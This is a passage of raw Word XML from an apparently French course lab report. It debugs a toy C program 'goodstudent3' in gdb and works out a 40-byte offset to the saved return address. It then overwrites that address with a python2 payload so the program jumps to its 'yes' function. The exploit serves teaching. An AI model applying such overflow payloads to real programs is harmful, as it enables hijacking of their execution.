        <w:t>0x7fffffffe0d0</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="46F630EF" w14:textId="77777777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 xml:space="preserve"> Saved registers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC00C20" w14:textId="77777777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 xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C41E8">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rbp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C41E8">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> at 0x7fffffffe0c0, rip at 0x7fffffffe0c8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9E1684" w14:textId="4AFADF1E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>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C41E8">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>gdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C41E8">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="000C41E8">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">x/8xg </w:t>
      </w:r>
      <w:r w:rsidR="00FB32DB" w:rsidRPr="00FB32DB">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>buffer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD2BF8F" w14:textId="60269385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>0x7fffffffe0a0:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="000C41E8">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0x0000000000000000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C41E8">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0x0000000000000000</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="020BC9AA" w14:textId="548D893E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>0x7fffffffe0b0:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="000C41E8">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0x00007fffffffe1f8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r w:rsidRPr="000C41E8">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0x00007ffff7ffe2c0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194423DA" w14:textId="72EEB721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>0x7fffffffe0c0:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="000C41E8">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0x00007fffffffe0e0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">         </w:t>
      </w:r>
      <w:r w:rsidRPr="000C41E8">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0x00005555555551f3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6620124D" w14:textId="005EB6DA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>0x7fffffffe0d0:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="000C41E8">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0x00007fffffffe1f8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r w:rsidRPr="000C41E8">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0x0000000100000000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776AF5FA" w14:textId="77777777" w:rsidR="000C41E8" w:rsidRPr="000C41E8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sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C41E8">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C41E8">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>gdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C41E8">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="000C41E8">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>p &amp;yes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF420CF" w14:textId="5D6B6823" w:rsidR="00CB4DF6" w:rsidRPr="003631F4" w:rsidRDefault="000C41E8" w:rsidP="000C41E8">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="6092"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C41E8">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$1 = (void (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000C41E8">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>*)(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000C41E8">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">)) </w:t>
      </w:r>
      <w:r w:rsidRPr="000C41E8">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0x555555555169</w:t>
      </w:r>
      <w:r w:rsidRPr="000C41E8">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000C41E8">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;yes&gt;</w:t>
      </w:r>
      <w:r w:rsidR="003631F4">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="375F0383" w14:textId="77777777" w:rsidR="000C41E8" w:rsidRDefault="000C41E8" w:rsidP="00C36895">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22FC8325" w14:textId="39C671DF" w:rsidR="000C41E8" w:rsidRDefault="000C41E8" w:rsidP="00C36895">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nous pouvons voir </w:t>
      </w:r>
      <w:r w:rsidR="004032F7">
        <w:t xml:space="preserve">que </w:t>
      </w:r>
      <w:r w:rsidR="00475F58">
        <w:t xml:space="preserve">la return </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00475F58">
        <w:t>address</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00475F58">
        <w:t xml:space="preserve"> se trouve </w:t>
      </w:r>
      <w:r w:rsidR="001048E6">
        <w:t>40 octets après le début du buffer.</w:t>
      </w:r>
      <w:r w:rsidR="00EF2B6B">
        <w:t xml:space="preserve"> Le buffer </w:t>
      </w:r>
      <w:r w:rsidR="00920A8C">
        <w:t xml:space="preserve">en lui-même </w:t>
      </w:r>
      <w:r w:rsidR="00EF2B6B">
        <w:t xml:space="preserve">fait 32 octets et </w:t>
      </w:r>
      <w:r w:rsidR="00486435">
        <w:t xml:space="preserve">il y a encore 8 octets entre </w:t>
      </w:r>
      <w:r w:rsidR="009042C6">
        <w:t xml:space="preserve">le buffer et la return </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009042C6">
        <w:t>address</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009042C6">
        <w:t xml:space="preserve">, correspondant à la sauvegarde </w:t>
      </w:r>
      <w:r w:rsidR="00393FAE">
        <w:t>du base pointer de la fonction</w:t>
      </w:r>
      <w:r w:rsidR="00CB62F8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CB62F8">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r w:rsidR="00393FAE">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05BD5077" w14:textId="77777777" w:rsidR="00CB62F8" w:rsidRDefault="00CB62F8" w:rsidP="00C36895">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75D22A84" w14:textId="25413720" w:rsidR="00CB62F8" w:rsidRDefault="00E9369B" w:rsidP="00C36895">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Nous allons maintenant continuer l</w:t>
      </w:r>
      <w:r w:rsidR="006073A7">
        <w:t xml:space="preserve">’exécution du programme en écrivant 48 octets pour </w:t>
      </w:r>
      <w:r w:rsidR="006073A7">
        <w:t>vérifier qu’on arrive</w:t>
      </w:r>
      <w:r w:rsidR="006073A7">
        <w:t xml:space="preserve"> à modifier la return </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006073A7">
        <w:t>address</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006073A7">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A14B218" w14:textId="77777777" w:rsidR="006073A7" w:rsidRDefault="006073A7" w:rsidP="00C36895">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D2DF006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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0090354E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">(gdb) </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA492D">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265DF02C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</w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0090354E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Continuing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0090354E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD3813A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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0090354E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FA492D">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="59118594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</w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="103E742E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</w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0090354E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Breakpoint</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0090354E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2, check () at goodstudent3.c:18</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FBD463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90354E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>18</w:t>
      </w:r>
      <w:r w:rsidRPr="0090354E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">    return </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0090354E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>strcasecmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0090354E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0090354E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>buffer, "Of course!\n");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460FC556" w14:textId="42E049B4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90354E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0090354E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>gdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0090354E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA492D">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">x/8xg </w:t>
      </w:r>
      <w:r w:rsidR="00FA492D">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>buffer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6612593E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90354E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0x7fffffffe0a0:</w:t>
      </w:r>
      <w:r w:rsidRPr="0090354E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>0x6161616161616161</w:t>
      </w:r>
      <w:r w:rsidRPr="0090354E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>0x6161616161616161</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F69A07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90354E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0x7fffffffe0b0:</w:t>
      </w:r>
      <w:r w:rsidRPr="0090354E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>0x6161616161616161</w:t>
      </w:r>
      <w:r w:rsidRPr="0090354E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>0x6161616161616161</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577FFE12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90354E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0x7fffffffe0c0:</w:t>
      </w:r>
      <w:r w:rsidRPr="0090354E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>0x6161616161616161</w:t>
      </w:r>
      <w:r w:rsidRPr="0090354E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FA492D">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0x6161616161616161</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6442D838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90354E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0x7fffffffe0d0:</w:t>
      </w:r>
      <w:r w:rsidRPr="0090354E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>0x00007fffffffe100</w:t>
      </w:r>
      <w:r w:rsidRPr="0090354E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>0x0000000100000000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736DDAD2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90354E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0090354E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>gdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0090354E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA492D">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58709B81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90354E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Continuing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730A8F62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772B958A" w14:textId="77777777" w:rsidR="0090354E" w:rsidRPr="0090354E" w:rsidRDefault="0090354E" w:rsidP="0090354E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90354E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Program received signal SIGSEGV, Segmentation fault.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55ADB246" w14:textId="5E14C166" w:rsidR="006073A7" w:rsidRPr="0090354E" w:rsidRDefault="0090354E" w:rsidP="0090354E">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA492D">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>0x6161616161616161</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA492D">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0090354E">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>in ?? ()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2625B4" w14:textId="77777777" w:rsidR="000C41E8" w:rsidRDefault="000C41E8" w:rsidP="00C36895">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EF72DCB" w14:textId="73356CC3" w:rsidR="00FA492D" w:rsidRDefault="00FA492D" w:rsidP="00C36895">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Nous pouvons voir en réaffichant la stack</w:t>
      </w:r>
      <w:r w:rsidR="006806D8">
        <w:t xml:space="preserve"> au deuxième </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006806D8">
        <w:t>breakpoint</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006806D8">
        <w:t xml:space="preserve"> que nous avons correctement </w:t>
      </w:r>
      <w:r w:rsidR="00A72834">
        <w:t xml:space="preserve">modifié </w:t>
      </w:r>
      <w:r w:rsidR="008D3B33">
        <w:t xml:space="preserve">la return </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008D3B33">
        <w:t>address</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008D3B33">
        <w:t xml:space="preserve"> avec la valeur 0x6161616161616161. Nous voyons ensuite en continuant l’exécution du programme qu’</w:t>
      </w:r>
      <w:r w:rsidR="003E1F2E">
        <w:t xml:space="preserve">il arrive une segmentation </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003E1F2E">
        <w:t>fault</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003E1F2E">
        <w:t xml:space="preserve"> en essayant d’exécuter les instructions à cette adresse</w:t>
      </w:r>
      <w:r w:rsidR="00087CAB">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C61376" w14:textId="77777777" w:rsidR="00036D8B" w:rsidRDefault="00036D8B" w:rsidP="00C36895">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="532EAB14" w14:textId="5C423699" w:rsidR="00036D8B" w:rsidRDefault="00036D8B" w:rsidP="00C36895">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nous pouvons donc relancer le programme </w:t>
      </w:r>
      <w:r w:rsidR="00087CAB">
        <w:t>en envoyant comme input 40 octets puis l’adresse de la fonction yes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352A73F5" w14:textId="77777777" w:rsidR="00087CAB" w:rsidRDefault="00087CAB" w:rsidP="00C36895">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="569674AA" w14:textId="77777777" w:rsidR="003A550B" w:rsidRPr="003A550B" w:rsidRDefault="003A550B" w:rsidP="003A550B">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/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(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003A550B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>gdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003A550B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="003A550B">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>run &lt;&lt;&lt; $(python2 -c "print 'A'*40 + '\x69\x51\x55\x55\x55\x55\x00\x00'")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65069079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The program being debugged has been started already.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E14F51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Start it from the beginning? (y or n) y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29ACBCB4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lastRenderedPageBreak/>
        <w:t>Starting program: /home/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003A550B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sebstreb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003A550B">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/cyber/cours2/goodstudent3 &lt;&lt;&lt; $(python2 -c "print 'A'*40 + '\x69\x51\x55\x55\x55\x55\x00\x00'")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D01CE8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 xml:space="preserve">[Thread debugging using </w:t>
      </w:r>
